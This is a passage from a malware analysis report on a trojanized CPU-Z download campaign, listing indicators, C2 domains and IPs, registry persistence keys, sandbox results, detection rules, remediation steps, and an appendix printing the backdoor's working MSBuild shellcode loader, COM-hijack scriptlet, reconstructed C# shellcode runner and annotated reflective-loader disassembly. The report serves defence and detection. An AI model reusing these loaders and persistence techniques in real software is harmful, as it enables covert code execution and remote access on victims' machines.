C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct             <- COM hijack -> regsvr32 launcher
C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\Clippy.sct              <- IPv6-encoded .NET runner
C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\data.dat                <- Shellcode payload for Moniker.dll
C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\Current\Cache\BuildCache.dat      <- XOR-encrypted shellcode for .proj
C:\Users\<USER>\AppData\Local\Microsoft\Windows\PowerShell\autorun.ps1            <- PowerShell profile persistence

Runtime artifacts:

C:\Users\<USER>\AppData\Local\Temp\<random>\<random>.0.cs     <- C# source (csc.exe input)
C:\Users\<USER>\AppData\Local\Temp\<random>\<random>.dll      <- Compiled .NET DLL (csc.exe output)
C:\Users\<USER>\AppData\Local\Temp\<random>\<random>.cmdline  <- csc.exe command line args
C:\ProgramData\CPUID Software\cpu-z\KPTwo6rj                  <- Staging/temp file

Browser activity (malware launches Chrome/Chromium):

Process: powershell.exe -> "C:\Program Files\Google\Chrome\Application\chrome.exe"

The malware launches Chrome as a child of the PowerShell process. Chromium files at %LOCALAPPDATA%\Chromium\(including extension 22ba6405535c46569a07) were read but not written — these are sandbox pre-existing artifacts, not malware-deployed. The purpose of launching Chrome remains under investigation (possibly for browser-based C2 or cookie/credential access).

Registry Keys

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<guid-pattern>
  = powershell -WindowStyle hidden -Command ...MSBuild.exe ...c_3791.proj

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\profile
  = powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File ...autorun.ps1

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\(Default)
  = script:...\ActiveX.sct

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64\(Default)
  = script:...\ActiveX.sct

Mutexes

Local\3ecd29ec-86b0-5c3c-40af48
Local\b2a6cfa5-0559-5ebf-4f1d24
Local\9daad017-ac2e-5144-677846
Local\970a9b7a-dc59-576e-0aeb59

Services Started

cpuz162
BITS
GoogleChromeElevationService
WSearch

Process Indicators

cpuz_x64.exe -> powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression"
powershell.exe -> csc.exe /noconfig /fullpaths @"...\<random>.cmdline"
csc.exe -> cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ...
powershell.exe -> chrome.exe (or chromium-based browser)
rundll32.exe "...\CRYPTBASE.dll",#1

6.4 Sigma / IDS Rules Triggered

Sigma Rules

Rule	Severity	Description
Malicious PowerShell Keywords	Medium	Detects keywords from PowerShell exploitation frameworks
Suspicious PowerShell WindowStyle Option	Medium	Hidden window execution
PowerShell Create Scheduled Task	Medium	Task scheduling for persistence
Potential Suspicious PowerShell Keywords	Medium	Exploitation framework indicators
(DLL high-severity sigma rule)	High	Triggered on CRYPTBASE.dll standalone analysis

IDS/Snort Rules

Rule	SID	Description
ET INFO Cloudflare DNS Over HTTPS Certificate Inbound	2027671	DoH usage detection

---

7. Sandbox Analysis Summary

7.1 CAPE Sandbox

Verdict: Malicious

Process Tree:

cpuz_x32.exe (PID: 6944)
cpuz_x64.exe (PID: 4036)
  -> powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression" (PID: 6536)
       -> csc.exe /noconfig /fullpaths @"...\ktc155gm.cmdline" (PID: 7040)
            -> cvtres.exe /NOLOGO /READONLY ... (PID: 3016)
       -> chrome.exe (PID: 7064)
rundll32.exe "...\CRYPTBASE.dll",#1 (PID: 6060)
  -> rundll32.exe "...\CRYPTBASE.dll",#1 (PID: 6796)

Tags: DETECT_DEBUG_ENVIRONMENT, SELF_DELETE, MACRO_POWERSHELL, PERSISTENCE, OBFUSCATED, CHECKS_BIOS, CRYPTO, LONG_SLEEPS

DNS: download.cpuid.com -> 195.154.81.43

Key behaviors: Full persistence chain installed, C2 callback observed via DoH.

7.2 C2AE Sandbox

Key observation – direct C2 communication captured:

POST https://172.67.145.101/d/callback
Host: welcome.supp0v3.com
-> 200 OK, Content-Type: application/json, Content-Length: 55, via: 1.1 Caddy

POST https://104.21.63.112/d/callback
Host: welcome.supp0v3.com
-> 200 OK, Content-Type: application/json, Content-Length: 55, via: 1.1 Caddy

C2 responded with 55-byte JSON payload. The dual IP access confirms load balancing behind Cloudflare.

7.3 Dr.Web vxCube

Additional processes observed:

• regsvr32.exe – COM registration (SCT scriptlet)
• consent.exe – UAC elevation attempt
• cmd.exe – Command shell spawned
• slui.exe – Software Licensing UI (possible evasion)

Multiple persistence Run keys with different GUID names confirmed across execution.

7.4 Zenbox

Verdict: Classified as CLEAN (false negative)

Tags: CALLS_WMI, DETECT_DEBUG_ENVIRONMENT, CHECKS_BIOS

The Zenbox sandbox failed to trigger the full malicious chain, likely due to the malware’s anti-sandbox checks detecting the environment. This highlights the malware’s effective evasion capabilities.

---

8. AV Detection Summary

ZIP Package (22/77 detections)

Engine	Detection Name
Kaspersky	Backdoor.Win64.Alien.de
BitDefender	Gen:Variant.Tedy.913617
Microsoft	(heuristic)
Sophos	Mal/Generic-S
AhnLab-V3	Trojan/Win.Generic.C5868013
Antiy-AVL	Trojan[Backdoor]/Win64.Alien
Cynet	Malicious (score: 99)
Rising	Trojan.DLLHijack!8.198C3
Google	Detected
K7AntiVirus	Backdoor (006de0071)

CRYPTBASE.dll Variant (31/76 detections)

Engine	Detection Name
Microsoft	Trojan:Win32/Wacatac.B!ml
CrowdStrike	win/malicious_confidence_60%
ESET-NOD32	Generik.HGAMZVE trojan
Elastic	malicious (high confidence)
Symantec	ML.Attribute.HighConfidence
Kaspersky	(via Kingsoft: Backdoor.Alien)
DeepInstinct	MALICIOUS
Tencent	Malware.Win32.Gencirc
Alibaba	Backdoor:Win64/MalwareX
Rising	Backdoor.Alien!8.241

---

9. Detection & Hunting Guidance

YARA Rules (Draft)

rule CPU_Z_DLL_Sideload_Alien_2026 {
    meta:
        description = "Detects trojanized CPU-Z CRYPTBASE.dll proxy (April 2026 campaign)"
        author = "nemesis"
        date = "2026-04-10"
        reference = "VT: eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46"
        severity = "high"
        tlp = "amber"

    strings:
        // C2 config JSON embedded in .rdata
        $c2_config = "{\"tag\":\"tbs\",\"referrer\":\"cpz\",\"callback\":" ascii
        $c2_domain = "supp0v3.com" ascii wide
        $c2_callback = "/d/callback" ascii wide

        // DLL proxy indicators
        $real_dll = "C:\\Windows\\System32\\CRYPTBASE.dll" ascii
        $proxy_name = "proxy.dll" ascii
        $export1 = "SystemFunction036" ascii
        $export2 = "SystemFunction040" ascii

        // Zig runtime strings
        $zig_panic = "thread  panic:" ascii
        $zig_recursive = "aborting due to recursive panic" ascii
        $zig_stripped = "Unable to dump stack trace: debug info stripped" ascii

        // Heartbeat template
        $hello = "{\"hello\":\"\"}" ascii

    condition:
        (uint16(0) == 0x5A4D) and (
            $c2_config or
            ($proxy_name and 2 of ($export*, $real_dll)) or
            (2 of ($zig_*) and any of ($c2_*, $proxy_name))
        )
}

rule CPU_Z_Clippy_SCT_IPv6_Loader {
    meta:
        description = "Detects Clippy.sct IPv6-encoded .NET deserialization payload"
        author = "nemesis"
        date = "2026-04-10"
        severity = "high"

    strings:
        $ipv6_func = "decodeIpv6" ascii
        $ipv6_stream = "ipv6ToStream" ascii
        $ipv6_array = "IPV6_ARRAY" ascii
        $binfmt = "BinaryFormatter" ascii
        $dynInvoke = "DynamicInvoke" ascii
        $svcClass = "ServiceClass" ascii
        $moniker = "Moniker" ascii

    condition:
        3 of them
}

rule CPU_Z_MSBuild_Shellcode_Loader {
    meta:
        description = "Detects MSBuild .proj shellcode loader (XOR + NtAllocateVirtualMemory)"
        author = "nemesis"
        date = "2026-04-10"
        severity = "high"

    strings:
        $proj = "<UsingTask" ascii
        $codetask = "CodeTaskFactory" ascii
        $ntallocate = "NtAllocateVirtualMemory" ascii
        $xor_key = "(1 + (i % 17))" ascii
        $buildcache = "BuildCache.dat" ascii
        $delegate = "GetDelegateForFunctionPointer" ascii
        $pkg_optimizer = "PackageOptimizerTask" ascii

    condition:
        $proj and 2 of them
}

Sigma Detection Rules

PowerShell stdin execution:

title: Suspicious PowerShell Stdin Execution
status: experimental
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains: '[Console]::In.ReadToEnd()'
    condition: selection
level: high

MSBuild persistence pattern:

title: MSBuild Persistence via Registry Run Key
status: experimental
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|contains: 'CurrentVersion\Run'
        Details|contains|all:
            - 'MSBuild.exe'
            - '.proj'
    condition: selection
level: high

Hunting Queries

Splunk:

index=windows sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1
Image="*\\powershell.exe" CommandLine="*[Console]::In.ReadToEnd()*"
| stats count by Computer, ParentImage, User

index=windows sourcetype=WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=13
TargetObject="*\\CurrentVersion\\Run\\*" Details="*MSBuild.exe*" Details="*.proj*"
| stats count by Computer, TargetObject, Details

KQL (Microsoft Sentinel):

// PowerShell stdin execution
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has "[Console]::In.ReadToEnd()"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine

// MSBuild persistence via Run key
DeviceRegistryEvents
| where RegistryKey has "CurrentVersion\\Run"
| where RegistryValueData has "MSBuild.exe" and RegistryValueData has ".proj"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData

// R2 bucket download detection (proxy/firewall logs)
DeviceNetworkEvents
| where RemoteUrl has_any ("pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev",
                            "pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev",
                            "pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev")
| project Timestamp, DeviceName, RemoteUrl, InitiatingProcessFileName

// DNS-over-HTTPS to resolve C2
DeviceNetworkEvents
| where RemoteUrl has "1.1.1.1/dns-query" and RemoteUrl has "supp0v3"
| project Timestamp, DeviceName, RemoteUrl

// Chrome launched by PowerShell (suspicious parent)
DeviceProcessEvents
| where FileName in~ ("chrome.exe", "msedge.exe")
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine

10. Remediation Steps

Immediate Actions

1. Block C2 domain at DNS, proxy, and firewall level:
   • supp0v3.com and *.supp0v3.com
2. Block R2 distribution domains:
   • pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev
   • pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev
   • pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev
3. Block backend IP: 147.45.178.61 (real server, not behind CDN)
4. Block C2 Cloudflare IPs (shared CDN — use with caution or block via SNI/domain):
   • 104.21.63.112
   • 172.67.145.101
5. Search for IOC file hashes across EDR/AV telemetry (see Section 6.1 for full list)
6. Search for registry persistence indicators on all endpoints
7. Alert users who downloaded CPUID software between April 9-10, 2026 to check for compromise

Host Remediation (if infected)

1. Delete all persistence and payload files:
   • C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\c_3791.proj
   • C:\Users\<USER>\AppData\Local\Packages\MSBuild\CommonBuild.proj
   • C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\Current\Cache\BuildCache.dat
   • C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct
   • C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\Clippy.sct
   • C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\data.dat
   • C:\Users\<USER>\AppData\Local\Microsoft\Windows\PowerShell\autorun.ps1
   • Any CRYPTBASE.dll outside of C:\Windows\System32\
2. Remove registry keys:
   • All HKCU\...\Run\ values referencing MSBuild .proj files or autorun.ps1
   • HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (all subkeys)
3. Remove scheduled tasks referencing MSBuild .proj files or hidden PowerShell (check for 68-minute interval tasks)
4. Check for and remove:
   • Temporary compiled DLLs in %TEMP%\<random>\ directories
   • Any .sct files in %LOCALAPPDATA%\Microsoft\Internet Explorer\
   • Any version.dll outside of C:\Windows\System32\ (FileZilla variant)
5. Verify legitimacy of any recently downloaded CPUID or FileZilla software by checking hashes against known-good versions
6. Re-image the host if full compromise is confirmed (recommended — the malware has 4 independent persistence paths and C2-delivered payloads may have installed additional backdoors)

---

11. References & VirusTotal Links

VirusTotal

Primary samples:

• ZIP Package
• CRYPTBASE.dll (bundled)
• CRYPTBASE.dll (variant)

C2-delivered persistence components:

• CommonBuild.proj / c_3791.proj
• ActiveX.sct
• Clippy.sct

Infrastructure:

• C2 URL (welcome.supp0v3.com)
• supp0v3.com domain

Related Research & Community Reporting (2026 Incident)

• Doc TB / CPUID official statement — “side API compromised for ~6 hours”
• vx-underground – CPUID domain delivering malware confirmation — “deeply trojanized, same group as FileZilla”
• Eric Parker – CPU-Z & HWMONITOR compromised
• Grummz – CPUID website infected warning
• CyberInsider – HWMonitor and CPU-Z downloads hijacked to deliver malware
• igor’sLAB – CPUID Suspected of Being a Virus; Suspicious HWMonitor Downloads
• CyberNews – CPUID website compromised with malware
• dev.ua – Hackers hacked the CPUID website
• VideoCardz – CPU-Z and HWMonitor installers flagged for malware
• Hacker News discussion
• MS Flight Simulator Forums – PSA about HWMonitor malware

STX RAT Documentation

• eSentire TRU – STX RAT: A new RAT in 2026 with Infostealer Capabilities — first public documentation; confirms 147.45.178.61, FileZilla vector, all persistence methods
• GBHackers – STX RAT Hides Remote Desktop, Steals Data
• Infosecurity Magazine – STX RAT Targets Finance Sector
• CyberSecurity News – New STX RAT Uses Hidden Remote Desktop

Historical Reference (2023 Campaign)

• BleepingComputer – Google ads push malicious CPU-Z app (2023 campaign)
• The Hacker News – New Malvertising Campaign (2023)

MITRE ATT&CK

• T1574.002 – Hijack Execution Flow: DLL Side-Loading
• T1127.001 – Trusted Developer Utilities Proxy Execution: MSBuild
• T1071.004 – Application Layer Protocol: DNS
• T1546.015 – Event Triggered Execution: Component Object Model Hijacking

---

Appendix A: Extracted Backdoor Components

The malware uses a multi-layer persistence architecture with three dropped components that work together. The C# “backdoor” is not a single file – it’s a chain of three components that ultimately execute shellcode from disk.

A.1 CommonBuild.proj / c_3791.proj – MSBuild Shellcode Loader

SHA256: 1f7fa30eefeedfdcaaf0eca7d20d866fd48e5d3e75dbe7e47976bac3c097b271 Size: 3,984 bytes Purpose:Persistence entry point. Executed by MSBuild.exe via registry Run key and scheduled task. Contains inline C# that reads BuildCache.dat, XOR-decrypts it, and executes the result as shellcode.

The .proj file masquerades as a legitimate MSBuild package optimizer (“Microsoft.Build.PackageOptimizer v2.1.4”) to avoid suspicion:

<Project Sdk="Microsoft.NET.Sdk" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <AssemblyName>Microsoft.Build.PackageOptimizer</AssemblyName>
    <Description>Optimizes package dependencies and build performance</Description>
  </PropertyGroup>

  <UsingTask TaskName="PackageOptimizerTask" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        using System;
        using System.IO;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class PackageOptimizerTask : Task {
            [DllImport("ntdll.dll")]
            private static extern uint NtAllocateVirtualMemory(IntPtr ProcessHandle,
                ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize,
                uint AllocationType, uint Protect);

            [DllImport("kernel32.dll")]
            private static extern IntPtr GetCurrentProcess();

            public override bool Execute() {
                OptimizePackageCache();
                return true;
            }

            private void OptimizePackageCache() {
                string cachePath = "C:\\Users\\Bruno\\AppData\\Local\\Microsoft\\MSBuild\\Current\\Cache\\BuildCache.dat";
                if (File.Exists(cachePath)) {
                    byte[] cacheData = File.ReadAllBytes(cachePath);
                    ProcessOptimizationCache(cacheData);
                }
            }

            // XOR decryption: key = (1 + (index % 17))
            private void ProcessOptimizationCache(byte[] data) {
                for (int i = 0; i < data.Length; i++) {
                    data[i] = (byte)(data[i] ^ (1 + (i % 17)));
                }
                ExecuteOptimization(data);
            }

            // Shellcode execution via NtAllocateVirtualMemory + delegate invoke
            private void ExecuteOptimization(byte[] optimization) {
                IntPtr hProcess = GetCurrentProcess();
                IntPtr baseAddr = IntPtr.Zero;
                IntPtr size = new IntPtr(optimization.Length);
                uint result = NtAllocateVirtualMemory(hProcess, ref baseAddr,
                    IntPtr.Zero, ref size, 0x3000, 0x40);  // RWX
                if (result == 0) {
                    Marshal.Copy(optimization, 0, baseAddr, optimization.Length);
                    var del = Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(Action));
                    del.DynamicInvoke();
                }
            }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>

Key details:

• XOR key: rolling (1 + (i % 17)) – a 17-byte repeating pattern
• Payload file: BuildCache.dat (written by the initial PowerShell stage)
• Uses NtAllocateVirtualMemory with PAGE_EXECUTE_READWRITE (0x40)
• Executes shellcode via Marshal.GetDelegateForFunctionPointer + DynamicInvoke

A.2 ActiveX.sct – COM Hijacking Scriptlet (Stage Launcher)

SHA256: 0d8d759db6c2012210a07ca825b01f727a3a23d615b8dbb4c241b508b2011448 Size: 977 bytes Purpose: COM TypeLib hijacking persistence. When any application loads the hijacked TypeLib GUID {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}, this scriptlet runs and launches the next stage (Clippy.sct) via regsvr32.exe.

<?xml version="1.0"?>
<scriptlet>
    <registration description="explorer" progid="explorer" version="1.2"
        classid="{0F859660-3A3E-4B16-8D75-260D132F9C4B}">
    </registration>
    <script language="JScript"><![CDATA[
      var WShell = new ActiveXObject("WScript.Shell");
      WShell.Run('regsvr32.exe /s /u "/i:C:\\Users\\Bruno\\AppData\\Local\\Microsoft\\Internet Explorer\\Clippy.sct" scrobj.dll', 0, false);
    ]]></script>
</scriptlet>

Key details:

• Uses regsvr32.exe LOLBin to load Clippy.sct (T1218.010)
• /s = silent, /u = unregister (but /i: overrides with the SCT URL)
• Window style 0 = hidden

A.3 Clippy.sct – IPv6-Encoded .NET Deserialization Shellcode Runner

SHA256: 02ff4cf4bea26993e4556706bada73fce98284388c57bad31ceb784c4791a703 Size: 11,879 bytes Purpose: The main execution payload. Contains a full .NET assembly (Moniker.dll) encoded as an array of IPv6 addresses, deserialized via BinaryFormatter, which reads and executes shellcode from a file on disk.

Encoding technique: A compiled .NET PE is serialized with BinaryFormatter, then each 16-byte group is encoded as an IPv6 address. The decoder reverses this:

function decodeIpv6(ip) {
    // Expand :: shorthand, split on ':', parse each group as hex
    // Each group produces 2 bytes (high byte, low byte)
    // Returns array of raw bytes
}

function ipv6ToStream(arr) {
    var ms = new ActiveXObject("System.IO.MemoryStream");
    for (var i = 0; i < arr.length; i++) {
        var bytes = decodeIpv6(arr[i]);
        for (var j = 0; j < bytes.length; j++) ms.WriteByte(bytes[j]);
    }
    ms.Position = 0;
    return ms;
}

Execution chain in Clippy.sct:

1. Set CachePath environment variable to data.dat location
2. Decode the IPv6 array into a MemoryStream
3. Deserialize with BinaryFormatter → creates a delegate chain
4. DynamicInvoke → Assembly.Load(byte[]) → loads Moniker.dll
5. CreateInstance('ServiceClass') → constructor runs the shellcode loader

Extracted Moniker.dll (.NET assembly):

SHA256: 3d805bd27ceb641615b755d26092b13c135e1f3eb9f9758cd9df4bd08ace3d2d Size: 4,185 bytes Architecture: i386 (.NET IL)

Reconstructed C# source:

using System;
using System.IO;
using System.Runtime.InteropServices;

[ComVisible(false)]
public class ServiceClass
{
    [DllImport("kernel32.dll")]
    private static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,
        uint flAllocationType, uint flProtect);

    [DllImport("kernel32.dll")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,
        uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,
        uint dwCreationFlags, out uint lpThreadId);

    [DllImport("kernel32.dll")]
    private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    public ServiceClass()
    {
        ProcessOptimizationCache();
    }

    private void ProcessOptimizationCache()
    {
        string cachePath = Environment.GetEnvironmentVariable("CachePath");
        // CachePath = "C:\Users\Bruno\AppData\Local\Microsoft\Internet Explorer\data.dat"

        if (File.Exists(cachePath))
        {
            byte[] buf = File.ReadAllBytes(cachePath);

            // Allocate RWX memory
            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)buf.Length,
                0x3000,   // MEM_COMMIT | MEM_RESERVE
                0x40);    // PAGE_EXECUTE_READWRITE

            Marshal.Copy(buf, 0, addr, buf.Length);

            // Execute shellcode in new thread
            uint threadId;
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,
                IntPtr.Zero, 0, out threadId);

            WaitForSingleObject(hThread, 0xFFFFFFFF); // INFINITE
        }
    }
}

A.4 Full Persistence Execution Flow

                    ┌─────────────────────────────────────────┐
                    │         PERSISTENCE TRIGGERS             │
                    │                                         │
                    │  1. Registry Run Key                    │
                    │     → powershell -WindowStyle hidden    │
                    │       -Command MSBuild.exe c_3791.proj  │
                    │                                         │
                    │  2. Scheduled Task (every 68 min)       │
                    │     → MSBuild.exe CommonBuild.proj      │
                    │                                         │
                    │  3. COM TypeLib Hijack                  │
                    │     → script:ActiveX.sct                │
                    │                                         │
                    │  4. PowerShell Profile autorun.ps1      │
                    └───────────┬─────────────────────────────┘
                                │
                ┌───────────────┼───────────────┐
                │               │               │
                ▼               ▼               ▼
        ┌──────────────┐  ┌──────────┐  ┌──────────────┐
        │ MSBuild Path │  │ COM Path │  │   PS Path    │
        │ c_3791.proj  │  │ActiveX.  │  │ autorun.ps1  │
        │              │  │  sct     │  │              │
        │ Reads:       │  │          │  │              │
        │ BuildCache   │  │ Launches │  │              │
        │   .dat       │  │ regsvr32 │  │              │
        │              │  │          │  │              │
        │ XOR decrypt  │  │ Loads    │  │              │
        │ key: 1+(i%17)│  │Clippy.sct│  │              │
        │              │  │          │  │              │
        │ Exec via     │  │ IPv6     │  │              │
        │ NtAllocate + │  │ decode → │  │              │
        │ delegate     │  │ BinFmt   │  │              │
        │ invoke       │  │ deser →  │  │              │
        │              │  │ Moniker  │  │              │
        │              │  │  .dll    │  │              │
        │              │  │          │  │              │
        │              │  │ Reads    │  │              │
        │              │  │ data.dat │  │              │
        └──────┬───────┘  │          │  │              │
               │          │ VirtAlloc│  │              │
               │          │ + thread │  │              │
               │          └────┬─────┘  └──────┬───────┘
               │               │               │
               └───────────────┼───────────────┘
                               │
                               ▼
                    ┌─────────────────────┐
                    │   SHELLCODE         │
                    │   (from disk file)  │
                    │                     │
                    │   → C2 callback     │
                    │   → Data exfil      │
                    │   → Remote access   │
                    └─────────────────────┘

A.5 BuildCache.dat / data.dat – Final Stage Shellcode

These are the final payload files written to disk by the PowerShell stage after receiving code from the C2. All persistence paths (MSBuild .proj, Clippy.sct -> Moniker.dll) ultimately read and execute these files.

BuildCache.dat is XOR-encrypted (key: 1+(i%17)) and read by CommonBuild.proj. data.dat is the same payload read by Moniker.dll. On VT they share the same hash — confirming they are the same content.

Three versions recovered from VT spanning the full campaign timeline (all 0/77 detection — undetected):

Version	SHA256	Size	PE Size	First Seen
December 2025	b2c45a026a115e60b5908a1f8474ff4acc6e14a64308996e00d16c7c11665216	710,731 B	355,348 B	2025-12-07
March 2026	2fe5443d785667344916f4d4684db0666820cd45b7ed4eb3f2e389600bfd2480	732,235 B	366,100 B	2026-03-20
April 2026	d4ac7b02f1472f4f15a981a2a7ec89e9f35e2e15d9564ad679ac339d0968390e	760,907 B	380,436 B	2026-04-09

XOR decryption confirmed: Applying data[i] ^ (1 + (i % 17)) to BuildCache.dat produces valid shellcode starting with fc 48 83 e4 f0 e8 00 00 00 00 (cld; and rsp,-0x10; call $+5).

Cross-version analysis confirmed same campaign:

• Identical shellcode stub architecture (PIC call $+5 / pop rax technique)
• Same reflective loader at constant offset +0x11F4 in all three versions
• PE headers 504/512 bytes identical across versions (8 bytes differ = size fields)
• Monotonically growing payload: 710KB -> 732KB -> 760KB (+21KB/month average)
• Same single import: KERNEL32.dll
• Same PE section layout: .text$mn, .rdata, .rdata$voltmd, .rdata$zzzdbg

Decrypted structure:

ffset 0x00-0x32: Shellcode stub (PIC, stack-aligned)
  fc              cld
  48 83 e4 f0     and rsp, -0x10           ; Align stack
  e8 00 00 00 00  call $+5                 ; Get RIP
  58              pop rax                  ; RAX = current addr
  48 05 29 00 00  add rax, 0x29            ; RAX -> metadata
  48 89 c1        mov rcx, rax             ; Arg1 = metadata
  48 89 c2        mov rdx, rax
  48 81 c2 XX XX  add rdx, <PE_offset>     ; RDX -> PE base
  48 89 d3        mov rbx, rdx
  48 81 c3 f4 11  add rbx, 0x11F4          ; RBX -> reflective loader
  48 83 ec 20     sub rsp, 0x20            ; Shadow space
  48 ff d3        call rbx                 ; Execute reflective loader

Offset 0x33-0x3E: Metadata header
  [0x33] Total PE size (DWORD)
  [0x37] Flags = 2 (DWORD)
  [0x3B] Raw PE data size (DWORD)

Offset 0x3F+: Embedded PE "out.dll" (encrypted, entropy ~8.0)
  MZ header -> reflective loader at +0x11F4
  Imports only KERNEL32.dll
  Sections: .text$mn, .rdata, .rdata$voltmd, .rdata$zzzdbg, .xdata, .edata, .pdata

A.6 Shellcode Disassembly and Annotation

The full shellcode + reflective loader + out.dll main function have been disassembled and annotated.

Reflective Loader (offset 0x1233, Stephen Fewer-style)

Uses dual-hash API resolution: ROR13 for the initial PEB walk (finding kernel32/ntdll), ROR14 for the embedded PE’s API resolution.

Resolved API hash table (reflective loader, ROR13):

Hash	API	Module
0x6a4abc5b	(module) kernel32.dll	PEB walk, UTF-16LE byte hash
0x3cfa685d	(module) ntdll.dll	PEB walk, UTF-16LE byte hash
0xec0e4e8e	LoadLibraryA	kernel32.dll
0x7c0dfcaa	GetProcAddress	kernel32.dll
0x91afca54	VirtualAlloc	kernel32.dll
0x60e0ceef	ExitThread	kernel32.dll

Reflective loader flow:

1. Walk PEB -> Ldr -> InMemoryOrderModuleList to find kernel32.dll and ntdll.dll
2. Parse export tables to resolve LoadLibraryA, GetProcAddress, VirtualAlloc, ExitThread
3. VirtualAlloc(NULL, SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) — allocate memory for PE
4. Copy PE headers to allocated memory
5. Map each PE section from raw offset to virtual address
6. Process import directory: LoadLibraryA for each DLL, GetProcAddress for each function
7. Process base relocations (delta fixups for ASLR)
8. NtFlushInstructionCache — flush CPU instruction cache
9. Calculate entry point address (ImageBase + AddressOfEntryPoint)
10. jmp rax — jump to out.dll DllMain with fdwReason = 0x0A (custom reason code)

The custom reason code 0x0A (decimal 10) is a canary value — only the reflective loader passes this value. If DllMain is called normally by Windows (reasons 0-3), the malicious code path is never triggered.

out.dll Entry Point (RVA 0x1000)

001000: sub  rsp, 0x28
001004: cmp  edx, 1              ; DLL_PROCESS_ATTACH?
001007: jne  check_custom
001009: mov  [rip+0xb9870], r8   ; Save lpReserved (normal load)
001010: jmp  exit_ok

check_custom:
001012: cmp  edx, 0xa            ; Custom reason 0x0A from reflective loader?
001015: jne  exit_ok
001017: mov  rcx, r8             ; Pass lpReserved as argument
00101a: call 0x115c              ; >>> MAIN MALICIOUS FUNCTION <<<

exit_ok:
00101f: mov  eax, 1              ; Return TRUE
001028: ret

out.dll Main Function (RVA 0x115C) — Annotated

Resolved API hash table (out.dll, ROR14):

Hash	API	Module
0x1ff5154e	(module) kernel32.dll	PEB walk, ASCII lowercase ROR14
0xbda4b2ca	(module) ntdll.dll	PEB walk, ASCII lowercase ROR14
0x5733ec35	VirtualProtect	kernel32.dll
0x758bd126	CreateThread	kernel32.dll
0x32ac9136	WaitForSingleObject	kernel32.dll
0x5a90917e	NtFlushInstructionCache	ntdll.dll

; === Stage 1: XXTEA DECRYPT (Corrected Block TEA) ===
00116e: lea  r8, [rip+0x5dcd3]      ; R8 = encrypted data blob in .data section
001175: lea  rcx, [rip+0x2e84]      ; RCX = XXTEA key pointer (4 DWORDs at .data start)
00117c: mov  edx, 0x16b90           ; EDX = 0x16B90 DWORDs (93,072 bytes = 23,268 DWORDs)
001181: call 0x12cc                  ; XXTEA decryption (delta=0x9E3779B9, key=4 DWORDs)

; === Stage 2: DEFLATE DECOMPRESS (RFC 1951) ===
001186: mov  r9d, 0x5ae3c           ; R9 = 0x5AE3C = decompressed size (372,284 bytes)
00118c: mov  [rsp+0x48], 0x5ba00    ; Output buffer = 0x5BA00 bytes (374,272 bytes)
0011a7: call 0x1d28                  ; Raw DEFLATE inflate (custom impl, tables in .rdata)
0011ac: test eax, eax               ; Check decompression success
0011ae: jne  cleanup                 ; If failed, exit

; === Stage 3: Resolve APIs via PEB walk + ROR14 hashing ===
0011b4: mov  ecx, 0x1ff5154e        ; kernel32.dll module hash
0011b9: call resolve_module          ; Walk PEB to find kernel32 base

0011be: mov  edx, 0x5733ec35        ; VirtualProtect hash
0011c9: call resolve_function        ; -> stored globally

0011ce: mov  edx, 0x758bd126        ; CreateThread hash
0011dd: call resolve_function        ; -> stored globally

0011e2: mov  edx, 0x32ac9136        ; WaitForSingleObject hash
0011f1: mov  rdi, rax               ; Save CreateThread ptr in RDI
0011f4: call resolve_function        ; -> stored globally

